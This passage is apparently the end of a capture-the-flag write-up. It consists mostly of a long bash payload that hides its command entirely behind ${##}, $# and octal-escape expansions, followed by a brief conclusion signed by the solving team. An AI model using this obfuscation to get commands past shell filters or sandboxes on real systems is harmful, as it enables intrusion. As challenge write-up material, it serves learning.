\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)${##}\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)$#\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)${##}\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)${##}\\\\\\\\${##}\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)\\\\\\\\\\\$\\\(\\\(${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\$\'\\$$\'${##}\\\)\\\)${##}\\\\\\\'

Conclusion

This was really a nice challenge and it required a lot of thought to solve, but it was really satisfying to finally get the flag.

And considering the multiple layers of bash we used, you could really say we 'bashed' it

~ yrlf, mickdermack, bumblefaq

/writeups/ $

$